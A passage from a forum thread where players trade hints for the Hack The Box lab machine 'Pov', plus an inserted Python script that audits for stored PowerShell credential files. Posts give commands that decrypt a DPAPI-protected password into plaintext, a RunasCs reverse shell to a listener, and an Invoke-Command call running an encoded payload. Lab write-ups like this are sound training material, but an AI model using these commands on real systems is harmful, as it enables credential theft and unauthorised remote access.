Pov - HTB
by paven - Saturday January 27, 2024 at 04:17 PM
#71
Decrypting password is the way to go. Just using creds to start a session gets the wrong kind of session. Need things to be a bit more interactive if you want to debug. Though somehow I did get it to work without decrypting the password earlier…
#72
why is my runas command killed before I can get a shell?
#73
I am still stuck on decrypting alaading's password. Any tips? I tried converting base64/hex etc, john and hashcat. Not sure what to do with this.
#74
(01-28-2024, 12:31 AM)Art10n Wrote: I am stuck on the ysoserial exe, I don't know how to run it in Parrot OS.

Me too hahaha, can't get it working in Linux
#75
I got alaading's password from the file, but I'm not able to use it to run a command as him. I've tried RunasCs.exe with "--bypass-uac", but I can't get it to work.

With this:
```
.\RunasCs.exe alaading f8gQ********** cmd.exe -r 10.10.X.X:5555 --bypass-uac
```
I can get it to reach out to my listener but the connection drops immediately.

Can anyone share how they were able to do it?! plz!
#76
(01-28-2024, 04:15 AM)ConnorDev Wrote:
(01-28-2024, 04:08 AM)asdfmonster Wrote: I am still stuck on decrypting alaading's password. Any tips? I tried converting base64/hex etc, john and hashcat. Not sure what to do with this.

https://book.hacktricks.xyz/windows-hard...web-config

Edit: never mind, I figured out where to go from what you mentioned.
#77
That part was a bit of a pain. Hope this helps. Trying to get to root but having some difficulties. Could use some help with that.

https://jeffhicks.substack.com/p/getting...powershell - GET THE PASS

------------------------ GETTING CRED

```
PS C:\Users\sfitz\Documents> get-job -State running | select -skip 1 | stop-job | remove-job
PS C:\Users\sfitz\Documents> $cred = Import-Clixml connection.xml
PS C:\Users\sfitz\Documents> $cred

UserName Password
-------- --------
alaading System.Security.SecureString


PS C:\Users\sfitz\Documents> $cred.GetNetworkCredential().password
PASS
```

---------------------------------GETTING SHELL AS USER

SHELL PORT - 5555
```
PS C:\Users\sfitz\Documents> $username = 'alaading'
PS C:\Users\sfitz\Documents> $password = 'PASS'
PS C:\Users\sfitz\Documents> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\Users\sfitz\Documents> $credential = New-Object System.Management.Automation.PSCredential ($username, $securePassword)
PS C:\Users\sfitz\Documents> Invoke-Command -ComputerName localhost -Credential $credential -ScriptBlock {powershell -e <encoded command removed>}
```
#78
(01-28-2024, 04:27 AM)asdfmonster Wrote:
(01-28-2024, 04:15 AM)ConnorDev Wrote:
(01-28-2024, 04:08 AM)asdfmonster Wrote: I am still stuck on decrypting alaading's password. Any tips? I tried converting base64/hex etc, john and hashcat. Not sure what to do with this.

https://book.hacktricks.xyz/windows-hard...web-config

I already have the shell into the site and logged in as sfitz, looking through the multiple web.config files doesn't reveal anything about decrypting alaading's pass, from what I saw. Did I miss something, is it in plaintext?

The password is encoded with DPAPI. You can recover the plaintext with a few simple PowerShell commands. Here's an article that should help you. ^_^
https://mcpmag.com/articles/2017/07/20/s...shell.aspx
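Added example, not part of the thread or any poster's code: a defender-side audit for the point made in #78, that an `Export-Clixml` credential file is only DPAPI-protected and is plaintext-equivalent to anyone running as its owner on that host. It finds such files by parsing the CLIXML and checking the DPAPI blob header; the sample document, the `svc_backup` account and the function names are constructed for illustration.

```python
import xml.etree.ElementTree as ET
from pathlib import Path

PS_NS = "{http://schemas.microsoft.com/powershell/2004/04}"
# A DPAPI blob starts with version 1 followed by the DPAPI provider GUID
# df9d8cd0-1501-11d1-8c7a-00c04fc297eb (stored with little-endian fields).
DPAPI_HEADER = "01000000d08c9ddf0115d1118c7a00c04fc297eb"

# Constructed sample in the shape Export-Clixml writes for a PSCredential;
# the blob is header plus filler bytes, not a real secret.
SAMPLE = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0"><T>System.Management.Automation.PSCredential</T><T>System.Object</T></TN>
    <Props>
      <S N="UserName">svc_backup</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb0100000000</SS>
    </Props>
  </Obj>
</Objs>"""


def find_stored_credentials(clixml):
    """Return one finding per SecureString (<SS>) element in CLIXML text or bytes."""
    try:
        root = ET.fromstring(clixml)
    except ET.ParseError:
        return []  # not well-formed XML, so not a CLIXML export
    findings = []
    for props in root.iter(PS_NS + "Props"):
        user = next((s.text for s in props.findall(PS_NS + "S")
                     if s.get("N") == "UserName"), None)
        for ss in props.findall(PS_NS + "SS"):
            blob = (ss.text or "").strip().lower()
            findings.append({"user": user, "field": ss.get("N"),
                             "dpapi": blob.startswith(DPAPI_HEADER),
                             "blob_bytes": len(blob) // 2})
    return findings


def scan_tree(root_dir):
    """Map each *.xml file under root_dir that holds a SecureString to its findings."""
    report = {}
    for path in Path(root_dir).rglob("*.xml"):
        try:
            hits = find_stored_credentials(path.read_bytes())
        except OSError:
            continue  # unreadable file: skip it rather than abort the audit
        if hits:
            report[str(path)] = hits
    return report
```

Treat every path `scan_tree` reports as a stored secret for the named account: rotate it if the owning profile or service account may have been compromised, and move the credential out of the user's files.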
#79
```
$credential = Import-Clixml -Path "c:\users\sfitz\documents\connection.xml"
echo ($credential.UserName + ":" + $credential.GetNetworkCredential().Password)
```
#80
```
Privilege Name                Description                    State
============================= ============================== ========
SeDebugPrivilege              Debug programs                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
```
Any hint?